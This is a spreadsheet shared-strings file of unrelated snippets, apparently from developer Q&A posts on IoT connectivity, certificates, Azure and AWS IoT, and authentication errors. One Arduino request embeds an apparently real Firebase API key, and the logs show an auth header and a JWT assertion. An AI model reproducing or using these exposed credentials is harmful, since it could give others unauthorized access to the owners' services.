    <t>Although currently only supporting Ethereum Proof of Authority, Microsoft plans to add Hyperledger Fabric, and Corda block chains.</t>
  </si>
  <si>
    <t>I've flagged 1493 instances of spam, and was one of the first users to receive the Marshal badge.</t>
  </si>
  <si>
    <t>I am very active in the php, mysql and security tag areas.</t>
  </si>
  <si>
    <t>Data should be logged to an SD-card found on a "Arduino Wireless SD shield".</t>
  </si>
  <si>
    <t>The app launches correctly, but when a device is discovered I get the following error.</t>
  </si>
  <si>
    <t>The main reason for asking it is I can see in the logs that someone is testing the waters to try and hack their way in, i.e.</t>
  </si>
  <si>
    <t>I will be monitoring and/or controlling the bot via its wifi video stream and an iPhone app while I watch TV on my couch.</t>
  </si>
  <si>
    <t>Are you supposed to be deleting the default account?</t>
  </si>
  <si>
    <t>I just had the same problem myself, the problem for me was that the game was running under admin privileges, and my programm wasn't.</t>
  </si>
  <si>
    <t>Both authors are using ESP8266WebServer with WiFiClientSecure and are experiencing the same problem.</t>
  </si>
  <si>
    <t>A built-in control in .NET framework class library (FCL) for taking password input.</t>
  </si>
  <si>
    <t>See also:
JSONEncoder documentation
Encoding and Decoding Custom Types
Encodable
Codable
jsondecoder
JSONSerialization</t>
  </si>
  <si>
    <t>Note: The required attribute works with the following input types: text, search, url, tel, email, password, date pickers, number, checkbox, radio, and file.</t>
  </si>
  <si>
    <t>Regarding the SD card itself, is it possible to protect it ?</t>
  </si>
  <si>
    <t>A login mechanism that tells the user, "Username invalid" leaks the fact that a user by that name does not exist.</t>
  </si>
  <si>
    <t>Is there anyway to configure the Xbee so that it can respond to only authentic commander?</t>
  </si>
  <si>
    <t>How do I prevent startx from running automatically on login?</t>
  </si>
  <si>
    <t>What is the best way to do this authentification?</t>
  </si>
  <si>
    <t>You need to connect with the computername in front of the username...like this...</t>
  </si>
  <si>
    <t>or 
How can I develop to get above functions (to get image or get fingerprint characteristics) using development manual?</t>
  </si>
  <si>
    <t>I can think of all sorts of somewhat ugly safeguards I could put in my code such as:
Switch to synchronous IO to write the data to disk (don't really want to do that for server responsiveness reasons).</t>
  </si>
  <si>
    <t>it is due to my synology router treat the package is intrusive and blocked.</t>
  </si>
  <si>
    <t>sudo reboot
Log back in and we issue
modprobe bnep
hciconfig hci0 lm master,accept
ip link set pan0 up
If you don't want pin prompt, don't do this next step.</t>
  </si>
  <si>
    <t>It uses arping to detect the device on the network along with the existence of a 0-byte file at /tmp/phone-presence.</t>
  </si>
  <si>
    <t>It's pretty straightforward to programmatically turn off all wireless network connectivity with Android's system services.</t>
  </si>
  <si>
    <t>Setup key based SSH on the server your want to run the script on
Transfer relevant keys to the Windows Server
Celebrate!</t>
  </si>
  <si>
    <t>Windows Phone 7 SDK:
No way to establish a peer-to-peer communication with a third party device.</t>
  </si>
  <si>
    <t>After mounting the WiFi shield the basic functionality is even not getting executed.</t>
  </si>
  <si>
    <t>My understanding is that the GAP handles security features during a BLE connection.</t>
  </si>
  <si>
    <t>Caution: in case of security model changes in newer OS versions this approach may not work.</t>
  </si>
  <si>
    <t>When you try to connect with a peripheral device, GATT discovery happens, services get resolved and connection establishes successfully.</t>
  </si>
  <si>
    <t>Password hashing API to simplify creating and managing passwords in a way that they cannot be easily reversed.</t>
  </si>
  <si>
    <t>Hacker News is a social news website about computer hacking and startup companies.</t>
  </si>
  <si>
    <t>Integrating Connect with PayPal means that PayPal takes the responsibility for customer information.</t>
  </si>
  <si>
    <t>I'd like to share the program but the code should be kept the most secret as possible, or at least make it hard to know.</t>
  </si>
  <si>
    <t>Click "Skip" in the corner to create a blank project that will have the device registration tab available.</t>
  </si>
  <si>
    <t>This tag refers to a situation in which you cannot access a protected system, file, database, etc.</t>
  </si>
  <si>
    <t>You might want to check the file permissions also.</t>
  </si>
  <si>
    <t>And adb devices won't show anything until it is connected with TCP.</t>
  </si>
  <si>
    <t>Mixed Code refers to a situation in which code, or sometimes data, of differing privileges share the same context.</t>
  </si>
  <si>
    <t>Three suggestions:
Azure CLI
At a PowerShell prompt type
az login
The az login command will open a new web browser window and ask your to log into your Azure Subscription account.</t>
  </si>
  <si>
    <t>{auth-module}
TID: [-1234] [] [2018-09-02 16:58:34,025] ERROR {auth-module} -  org.wso2.carbon.apimgt.integration.client.exception.APIMClientOAuthException: Failed to retrieve scopes from access token {auth-module}
org.mozilla.javascript.WrappedException: Wrapped org.wso2.carbon.apimgt.integration.client.exception.APIMClientOAuthException: Failed to retrieve scopes from access token (/devicemgt/app/modules/login.js#31)
Full stacketrace: 
TID: [-1] [] [2018-09-02 16:56:21,061] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Listener I/O dispatcher-1 &gt;&gt; "POST /token?tenantDomain=carbon.super HTTP/1.1[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,064] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Listener I/O dispatcher-1 &gt;&gt; "Authorization: Basic Z1UxanlPOUxvS3JlWGFYb1V2c1NqWTc1VkdBYTpKU1kxc0R...NWkt4ZmdFSmNh[\r]
[\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,064] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Listener I/O dispatcher-1 &gt;&gt; "Content-Type: application/x-www-form-urlencoded[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,064] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Listener I/O dispatcher-1 &gt;&gt; "Content-Length: 826[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,064] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Listener I/O dispatcher-1 &gt;&gt; "Host: wazidmg.cf:8243[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,064] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Listener I/O dispatcher-1 &gt;&gt; "Connection: Keep-Alive[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,065] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Listener I/O dispatcher-1 &gt;&gt; "User-Agent: Apache-HttpClient/4.3.6 (java 1.5)[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,065] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Listener I/O dispatcher-1 &gt;&gt; "Accept-Encoding: gzip,deflate[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,065] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Listener I/O dispatcher-1 &gt;&gt; "[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,065] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Listener I/O dispatcher-1 &gt;&gt; "grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer&amp;assertion=eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsImF1ZCI6WyJkZXZpY2VtZ3QiXSwibmJmIjoxNTM1OTA3Mzgws_eitWu0w30lyqZGU9P79f5y-FRIYkTOuWs-MVckTqpuktzdt51uNfB7iJygFNmDHMXTDQRQZJ4D9vWy0tRx1O_nU8rdBtcn8e-SP0zJTEvAEXST__lJHinNVeq1op2SqLSciP-jfvlFZo8ooF0KRqvhqsyX2Je3MDnLir8O22pv3PW3-Ttz-yHOxQpeSXw5RrPAILjWkLPDqqx9XrEtgqJBrSH115TumNiyvoGPaLpa67jddIfFy70wjIBYGkSqRYGtWOWLz3q2wC5QNrK02wCCJhLf9nM60mjhDeoAo6pVjI4xnpacTOnkDJ8WLnBkhNNvTNRD-88x2p1LYVvDww&amp;scope=apim%3Aapi_create+apim%3Aapi_view+apim%3Aapi_publish+apim%3Asubscribe+apim%3Atier_view+apim%3Atier_manage+apim%3Asubscription_view+apim%3Asubscription_block" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,284] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Sender I/O dispatcher-1 &gt; "HTTP/1.1 400 Bad Request[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,693] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Sender I/O dispatcher-1 &gt;&gt; "X-Frame-Options: DENY[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,693] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Sender I/O dispatcher-1 &gt;&gt; "X-Content-Type-Options: nosniff[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,693] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Sender I/O dispatcher-1 &gt;&gt; "X-XSS-Protection: 1; mode=block[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,694] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Sender I/O dispatcher-1 &gt;&gt; "Date: Sun, 02 Sep 2018 16:56:21 GMT[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,694] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Sender I/O dispatcher-1 &gt;&gt; "Content-Type: application/json[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,694] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Sender I/O dispatcher-1 &gt;&gt; "Content-Length: 92[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,694] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Sender I/O dispatcher-1 &gt;&gt; "Connection: close[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,694] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Sender I/O dispatcher-1 &gt;&gt; "Server: WSO2 Carbon Server[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,694] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Sender I/O dispatcher-1 &gt;&gt; "[\r][\n]" {org.apache.synapse.transport.http.wire}
TID: [-1] [] [2018-09-02 16:56:21,694] DEBUG {org.apache.synapse.transport.http.wire} -  HTTPS-Sender I/O dispatcher-1 &gt;&gt; "{"error_description":"Signature or Message Authentication invalid.</t>
  </si>
  <si>
    <t>IoT Hub Federation</t>
  </si>
  <si>
    <t>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System.Net.Security.SslState.ThrowIfExceptional()
   at System.Net.Security.SslState.InternalEndProcessAuthentication(LazyAsyncResult lazyResult)
   at System.Net.Security.SslState.EndProcessAuthentication(IAsyncResult result)
   at System.Net.Security.SslStream.EndAuthenticateAsClient(IAsyncResult asyncResult)
   at System.Net.Security.SslStream.&lt;&gt;c.&lt;AuthenticateAsClientAsync&gt;b__46_2(IAsyncResult iar)
   at System.Threading.Tasks.TaskFactory`1.FromAsyncCoreLogic(IAsyncResult iar, Func`2 endFunction, Action`1 endAction, Task`1 promise, Boolean requiresSynchronization)
--- End of stack trace from previous location where exception was thrown ---
   at Microsoft.Azure.Amqp.TaskHelpers.EndAsyncResult(IAsyncResult asyncResult)
   at Microsoft.Azure.Amqp.Transport.TlsTransport.HandleOpenComplete(IAsyncResult result, Boolean syncComplete)
--- End of stack trace from previous location where exception was thrown ---
   at Microsoft.Azure.Amqp.AsyncResult.End[TAsyncResult](IAsyncResult result)
   at Microsoft.Azure.Amqp.AmqpObject.OpenAsyncResult.End(IAsyncResult result)
   at Microsoft.Azure.Amqp.AmqpObject.EndOpen(IAsyncResult result)
   at Microsoft.Azure.Amqp.Transport.TlsTransportInitiator.HandleTransportOpened(IAsyncResult result)
   at Microsoft.Azure.Amqp.Transport.TlsTransportInitiator.OnTransportOpened(IAsyncResult result)
--- End of stack trace from previous location where exception was thrown ---
   at Microsoft.Azure.Devices.Client.Transport.Amqp.AmqpConnector.InitializeTransport(TimeSpan timeout)
   at Microsoft.Azure.Devices.Client.Transport.Amqp.AmqpConnector.OpenConnectionAsync(TimeSpan timeout)
   at Microsoft.Azure.Devices.Client.Transport.Amqp.AmqpConnectionHolder.EnsureConnection(TimeSpan timeout)
   at Microsoft.Azure.Devices.Client.Transport.Amqp.AmqpConnectionHolder.AmqpSessionCreator(DeviceIdentity deviceIdentity, ILinkFactory linkFactory, AmqpSessionSettings amqpSessionSettings, TimeSpan timeout)
   at Microsoft.Azure.Devices.Client.Transport.Amqp.AmqpUnit.OpenAsync(TimeSpan timeout)
   at Microsoft.Azure.Devices.Client.Transport.Amqp.AmqpTransportHandler.OpenAsync(CancellationToken cancellationToken)
   at Microsoft.Azure.Devices.Client.Transport.ProtocolRoutingDelegatingHandler.OpenAsync(CancellationToken cancellationToken)
   at Microsoft.Azure.Devices.Client.Transport.ErrorDelegatingHandler.&lt;&gt;c__DisplayClass22_0.&lt;&lt;ExecuteWithErrorHandlingAsync&gt;b__0&gt;d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
   at Microsoft.Azure.Devices.Client.Transport.ErrorDelegatingHandler.ExecuteWithErrorHandlingAsync[T](Func`1 asyncOperation)
   --- End of inner exception stack trace ---
   at Microsoft.Azure.Devices.Client.Transport.ErrorDelegatingHandler.ExecuteWithErrorHandlingAsync[T](Func`1 asyncOperation)
   at Microsoft.Azure.Devices.Client.Transport.RetryDelegatingHandler.&lt;&gt;c__DisplayClass32_0.&lt;&lt;OpenAsyncInternal&gt;b__0&gt;d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
   at Microsoft.Azure.Devices.Client.Transport.RetryDelegatingHandler.EnsureOpenedAsync(CancellationToken cancellationToken)
   at Microsoft.Azure.Devices.Client.Transport.RetryDelegatingHandler.&lt;&gt;c__DisplayClass14_0.&lt;&lt;SendEventAsync&gt;b__0&gt;d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
   at Microsoft.Azure.Devices.Client.Transport.RetryDelegatingHandler.SendEventAsync(Message message, CancellationToken cancellationToken)
   at Microsoft.Azure.Devices.Client.InternalClient.SendEventAsync(Message message)
   at Microsoft.Azure.Devices.Edge.Samples.EdgeDownstreamDevice.Program.SendEvents(DeviceClient deviceClient, Int32 messageCount) in C:\Temp\iotedge\samples\dotnet\EdgeDownstreamDevice\Program.cs:line 215
   --- End of inner exception stack trace ---
   at System.Threading.Tasks.Task.Wait(Int32 millisecondsTimeout, CancellationToken cancellationToken)
   at System.Threading.Tasks.Task.Wait()
   at Microsoft.Azure.Devices.Edge.Samples.EdgeDownstreamDevice.Program.Main() in C:\Temp\iotedge\samples\dotnet\EdgeDownstreamDevice\Program.cs:line 84
Update:
The only way I am able to connect leaf device is - create leaf device manually and use Mqtt protocol.</t>
  </si>
  <si>
    <t>at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()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System.Threading.Tasks.TaskFactory2 endFunction, Action1 endAction, Task1 promise, Boolean requiresSynchronization)
   --- End of inner exception stack trace ---
   at Microsoft.Azure.Devices.Client.DeviceClient.&lt;&gt;c.b__79_2(Task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SimulatedTemperatureSensor.Program.d__4.MoveNext() in /opt/vsts/work/1/s/edge-modules/SimulatedTemperatureSensor/src/Program.cs:line 105
--- End of stack trace from previous location where exception was thrown ---
   at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   at Microsoft.Azure.Devices.Client.Transport.Mqtt.Util.d__14.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
   at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   at Microsoft.Azure.Devices.Client.Transport.Mqtt.MqttIotHubAdapter.d__34.MoveNext()
   --- End of inner exception stack trace ---
   at System.Threading.Tasks.Task.ThrowIfExceptional(Boolean includeTaskCanceledExceptions)
   at System.Threading.Tasks.Task`1.GetResultCore(Boolean waitCompletionNotification)
   at SimulatedTemperatureSensor.Program.Main() in /opt/vsts/work/1/s/edge-modules/SimulatedTemperatureSensor/src/Program.cs:line 28</t>
  </si>
  <si>
    <t>2018/06/17 10:33:17 [emerg] 17940#17940: BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem") failed (SSL: error:02001002:system library:fo$
2018/06/17 10:35:44 [emerg] 17974#17974: BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem") failed (SSL: error:02001002:system library:fo$
2018/06/17 10:37:34 [emerg] 18038#18038: BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem") failed (SSL: error:02001002:system library:fo$
2018/06/17 10:40:42 [emerg] 18124#18124: BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem") failed (SSL: error:02001002:system library:fo$
2018/06/17 10:41:39 [emerg] 18145#18145: BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem") failed (SSL: error:02001002:system library:fo$
2018/06/17 10:43:34 [emerg] 18159#18159: BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem") failed (SSL: error:02001002:system library:fo$
2018/06/17 10:44:18 [emerg] 18185#18185: "upstream" directive is not allowed here in /etc/nginx/sites-enabled/default:1
2018/06/17 10:44:37 [emerg] 18201#18201: "upstream" directive is not allowed here in /etc/nginx/sites-enabled/default:1
2018/06/17 10:46:09 [emerg] 18221#18221: BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem") failed (SSL: error:02001002:system library:fo$
2018/06/17 10:49:46 [emerg] 18235#18235: BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem") failed (SSL: error:02001002:system library:fo$
2018/06/17 10:46:22 [emerg] 526#526: BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem") failed (SSL: error:02001002:system library:fopen:$
2018/06/17 10:56:58 [emerg] 619#619: BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem") failed (SSL: error:02001002:system library:fopen:$
2018/06/17 11:09:45 [emerg] 773#773: BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem") failed (SSL: error:02001002:system library:fopen:$
2018/06/17 11:18:12 [emerg] 865#865: BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem") failed (SSL: error:02001002:system library:fopen:$
I am kinda new here and I really hope that someone can help me.</t>
  </si>
  <si>
    <t>2017/02/14 1:30:12 [TRACE] [kaa_client.c:235] (0) - Processing OUT event for the client socket 4
2017/02/14 1:30:12 [TRACE] [kaa_tcp_channel.c:740] (0) - Kaa TCP channel [0x929A2016] socket was successfully connected
2017/02/14 1:30:12 [TRACE] [kaa_tcp_channel.c:1156] (0) - Calling kaa_platform_protocol_alloc_serialize_client_sync
2017/02/14 1:30:12 [TRACE] [kaa_platform_protocol.c:245] (0) - Serializing client sync...
2017/02/14 1:30:12 [TRACE] [kaa_platform_protocol.c:72] (0) - Going to serialize client meta sync
2017/02/14 1:30:12 [TRACE] [kaa_platform_protocol.c:111] (0) - Meta sync: payload length '76', request id '2'
2017/02/14 1:30:12 [TRACE] [kaa_notification_manager.c:505] (0) - Going to serialize client notification sync
2017/02/14 1:30:12 [TRACE] [kaa_notification_manager.c:520] (0) - Going to serialize 0 topic states
2017/02/14 1:30:12 [TRACE] [kaa_notification_manager.c:532] (0) - Going to serialize 0 uids
2017/02/14 1:30:12 [TRACE] [kaa_logging.c:655] (0) - Going to serialize client logging sync
2017/02/14 1:30:12 [TRACE] [kaa_logging.c:686] (0) - Extracting log records... (bucket size 34)
2017/02/14 1:30:12 [INFO] [kaa_logging.c:733] (0) - Created log bucket: id '1', log records count 1, payload size 36
2017/02/14 1:30:12 [TRACE] [kaa_event.c:695] (0) - Going to serialize client event sync
2017/02/14 1:30:12 [TRACE] [kaa_event.c:701] (0) - Going to sync event SQN
2017/02/14 1:30:12 [TRACE] [kaa_configuration_manager.c:220] (0) - Going to serialize client configuration sync
2017/02/14 1:30:12 [TRACE] [kaa_user.c:435] (0) - Going to serialize client user sync
2017/02/14 1:30:12 [TRACE] [kaa_profile.c:281] (0) - Going to compile profile client sync
2017/02/14 1:30:12 [TRACE] [kaa_profile.c:326] (0) - Writing public key (size 294)...
2017/02/14 1:30:12 [INFO] [kaa_platform_protocol.c:256] (0) - Client sync serialized: request id '2', payload size '504'
2017/02/14 1:30:12 [TRACE] [kaa_tcp_channel.c:1180] (0) - Kaa TCP channel [0x929A2016] going to send CONNECT message (512 bytes)
2017/02/14 1:30:12 [TRACE] [kaa_tcp_channel.c:1242] (0) - Kaa TCP channel [0x929A2016] created CONNECT message (1045 bytes)
2017/02/14 1:30:12 [TRACE] [kaa_logging.c:449] (0) - Upload will not be triggered now.</t>
  </si>
  <si>
    <t>CA and device certificates must be in PEM format
After going through previous responses on StackOverflow and elsewhere, this is what I've tried so far (using default config file):
Option 1
openssl req -x509 -nodes -newkey rsa:2048 -days 365 -keyout ca.key -out ca.crt -subj "/CN=unused"
openssl req -nodes -newkey rsa:2048 -days 365 -keyout device.key -out device.csr -subj "/CN=unused"
openssl x509 -req -days 365 -in device.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out device.crt
Option 2
openssl req -new -x509 -nodes -days 365 -newkey rsa:2048 -keyout ca.key -out ca.crt -subj "/CN=unused"
openssl genrsa -out device.key 2048
openssl req -new -days 365 -key device.key -out device.csr -subj "/CN=unused"
openssl x509 -req -days 365 -in device.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out device.crt
The certificates get created just fine in both cases, but when I try to register the device with this certificate, I get an error stating that the device certificate could not be verified against the CA certificate.</t>
  </si>
  <si>
    <t>Using the CLI i made CA certificate using rsa key
openssl genrsa -out certs/rootCA.key 2048
openssl req -x509 -new -nodes -key certs/rootCA.key -sha256 -days 1024 -out certs/rootCA.pem
aws iot get-registration-code (registrationCode used later as a "Common Name")
openssl genrsa -out certs/verificationCert.key 2048
Then i created a CSR
openssl req -new -key certs/verificationCert.key -out certs/verificationCert.csr
openssl x509 -req -in certs/verificationCert.csr -CA certs/rootCA.pem -CAkey certs/rootCA.key -CAcreateserial -out certs/verificationCert.crt -days 500 -sha256
Registered the CA Certificate
aws iot register-ca-certificate --ca-certificate file://certs/rootCA.pem --verification-certificate file://certs/verificationCert.crt --allow-auto-registration
aws iot update-ca-certificate --certificate-id e3f0a30c3bbd4c9fdbb752cf2717fda21fbd2f8158e5dc0bb320c8bdbabf6295 --new-status ACTIVE
Then i used the the verificationCert.csr for createCertificateFromCsr and used the certificateArn from response in attachPolicy and attachThingPrincipal</t>
  </si>
  <si>
    <t>Executing this file I have the following error
azure-iot-provisioning-device:X509Registration registrationId: first +0ms
  azure-iot-provisioning-device:PollingStateMachine register called for registrationId "first" +0ms
  azure-iot-provisioning-device:PollingStateMachine completed transition from disconnected to sendingRegistrationRequest +0ms
  azure-iot-provisioning-device-http:Http submitting PUT for first to /0ne00015676/registrations/first/register?api-version=2017-11-15 +0ms
  azure-iot-provisioning-device-http:Http {"registrationId":"first"} +0ms
  azure-iot-provisioning-device-http:Http error executing PUT: UnauthorizedError: Error: {"errorCode":401002,"trackingId":"e6b9c185-64c4-4535-8d23-a7625dd3e011","message":"Unauthorized","timestampUtc":"2018-04-23T12:21:56.1390465Z"} +353ms
Error code "401002 is  IotHubUnauthorizedAccess "
thanks</t>
  </si>
  <si>
    <t>The process for creating the certificates:
# Server: https://support.symantec.com/en_US/article.TECH242030.html
openssl req -new -sha256 -out cert.csr
openssl x509 -req -days 365 -in cert.csr -signkey privkey.pem -sha256 -out cert.crt
openssl x509 -in cert.crt -out ca.pem -outform PEM
# Client:
openssl req -new -sha256 -out pi.csr
openssl x509 -req -days 365 -in pi.csr -signkey privkey.pem -sha256 -out pi.crt # &lt;--- privkey.pem is the privkey of CA
openssl x509 -in pi.crt -out pi.pem -outform PEM</t>
  </si>
  <si>
    <t>This will be helpful for someone someday:
Construct authorization header for Azure IoT Hub
https://github.com/snobu/Azure-IoT-Hub/blob/master/make-token.sh
And a sample MQTT user/pass combo for Azure IoT Hub (yes the password is brutal and includes a whitespace):
https://github.com/Azure/azure-content/blob/master/articles/iot-hub/iot-hub-devguide.md#example
Username (DeviceId is case sensitive): 
Password (Generate SAS with Device Explorer): SharedAccessSignature sr=iothubname.azure-devices.net%2fdevices%2fDeviceId&amp;sig=kPszxZZZZZZZZZZZZZZZZZAhLT%2bV7o%3d&amp;se=1487709501</t>
  </si>
  <si>
    <t>But the next HTTP requests return BAD HTTP REQUEST:
IPD,298:HTTP/1.1 200 OK
Date: Fri, 01 Dec 2017 01:40:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: awex
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: cf44e42dbd53cb7cb5456e4b70e3399d
10
accion: encender
+IPD,5:0
+IPD,428:HTTP/1.1 400 Bad Request
Date: Fri, 01 Dec 2017 01:40:56 GMT
Content-Type: text/html
Content-Length: 170
Connection: close
Server: awex
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: d8ffa7b4eece5d1e88c7786fea5ace9f
&lt;html&gt;
&lt;head&gt;&lt;title&gt;400 Bad Request&lt;/title&gt;&lt;/head&gt;
&lt;body bgcolor="white"&gt;
&lt;center&gt;&lt;h1&gt;400 Bad Request&lt;/h1&gt;&lt;/center&gt;
&lt;hr&gt;&lt;center&gt;openresty&lt;/center&gt;
&lt;/body&gt;
&lt;/html&gt;
CLOSED
What I am doing wrong?</t>
  </si>
  <si>
    <t>I've tried to create a POST request on my arduino via AT command:
also in the format: 
char* request =  "POST / HTTP/1.0\r\nHost: https://XXXXXX/message_list.json\r\nAuthorization: key=XXXXXX\r\nContent-Type: application/json\r\nContent-Length: 13\r\n\r\n{\"hello\":\"2\"}";
tried also with no content
char* request =  "POST / HTTP/1.1\r\nHost: https://airwatch-yuki.firebaseio.com/message_list.json\r\nAuthorization: key=AIzaSyAgYd0MIblEmo4elyxAYpAdgXhNTweVqhw\r\nContent-Type: application/json\r\nContent-Length: 0\r\n\r\n";
Which posts
POST / HTTP/1.0
Host: https://XXXXXX.firebaseio.com/message_list.json
Authorization: key=XXXXXX
Content-Type: application/json
Content-Length: 13
{"hello":"2"}
But get the following error:
+IPD,179:HTTP/1.0 400 Bad Request
Content-Length: 54
Content-Type: text/html; charset=UTF-8
Date: Thu, 23 Nov 2017 18:08:48 GMT
&lt;html&gt;&lt;title&gt;Error 400 (Bad Request)!</t>
  </si>
  <si>
    <t>Notes:
    - I am following the tutorial - https://docs.microsoft.com/en-us/azure/iot-edge/how-to-create-transparent-gateway#install-certificates-on-the-gateway
    - I am using the certificate creation script from iotedge repo (https://github.com/Azure/iotedge.git)
    - Creating certificates on the edge device itself and working directory is - "C:\Temp\GWCerts"
    - My downstream device is an application running on the edge device itself  
Following are the steps that I have performed:
Created the root CA certificate and intermediate certificate using following PowerShell command:
New-CACertsCertChain rsa
Created the IoT Edge device CA certificate and private key with following command:
New-CACertsEdgeDevice "myedgedevice"
Modified the IoT Edge security config file (config.yaml) to set certificate properties as:  certificates:
device_ca_cert: "C:\Temp\GWCerts\certs\certs\iot-edge-device-myedgedevice-full-chain.cert.pem"
device_ca_pk: "C:\Temp\GWCerts\private\iot-edge-device-myedgedevice.key.pem"
trusted_ca_certs: "C:\Temp\GWCerts\certs\azure-iot-test-only.root.ca.cert.pem" 
Restarted iotedge
Deployed edgeHub and ai_insights modules with following routes:
"sensorToAIInsightsInput1": "FROM /messages/* WHERE NOT IS_DEFINED($connectionModuleId) INTO BrokeredEndpoint(\"/modules/ai_insights/inputs/input1\")",
"AIInsightsToIoTHub": "FROM /messages/modules/ai_insights/outputs/output1 INTO $upstream"
Registered root CA certificate to my IoT Hub
Created downstream device certificate using following command:
New-CACertsDevice "myfirstchilddevice"
Created IoT Device programmatically using DPS
a.</t>
  </si>
  <si>
    <t>Use this tool and guide to generate test certificates (we recommend a proper PKI and CSR for production environments): https://github.com/Azure/azure-iot-sdk-c/blob/master/tools/CACertificates/CACertificateOverview.md 
You can then use either Step 3 in the link above or the tool/sample available here to create the verification certificate: https://github.com/Azure/azure-iot-sdk-csharp/tree/master/provisioning/service/samples/GroupCertificateVerificationSample.</t>
  </si>
  <si>
    <t>Creating one is this easy:
Two easy ways to get your credentials to are:
The built-in interactive_console.py tool (if you already have a consumer key &amp; secret)
The Tumblr API console at https://api.tumblr.com/console
Supported Methods
User Methods
python
client.info() # get information about the authenticating user
client.dashboard() # get the dashboard for the authenticating user
client.likes() # get the likes for the authenticating user
client.following() # get the blogs followed by the authenticating user
client.follow('codingjester.tumblr.com') # follow a blog
client.unfollow('codingjester.tumblr.com') # unfollow a blog
client.like(id, reblogkey) # like a post
client.unlike(id, reblogkey) # unlike a post
Blog Methods
client.blog_info('codingjester') # get information about a blog
client.posts('codingjester', **params) # get posts for a blog
client.avatar('codingjester') # get the avatar for a blog
client.blog_likes('codingjester') # get the likes on a blog
client.followers('codingjester') # get the followers of a blog
client.queue('codingjester') # get the queue for a given blog
client.submission('codingjester') # get the submissions for a given blog
Post Methods
Creating posts
PyTumblr lets you create all of the various types that Tumblr supports.</t>
  </si>
  <si>
    <t>Update (including actual code):
App.js:
var awsIot = require('aws-iot-device-sdk');
var name = 'THING_ID';
var app = awsIot.device({
    keyPath: '../../certs/private.pem.key',
    certPath: '../../certs/certificate.pem.crt',
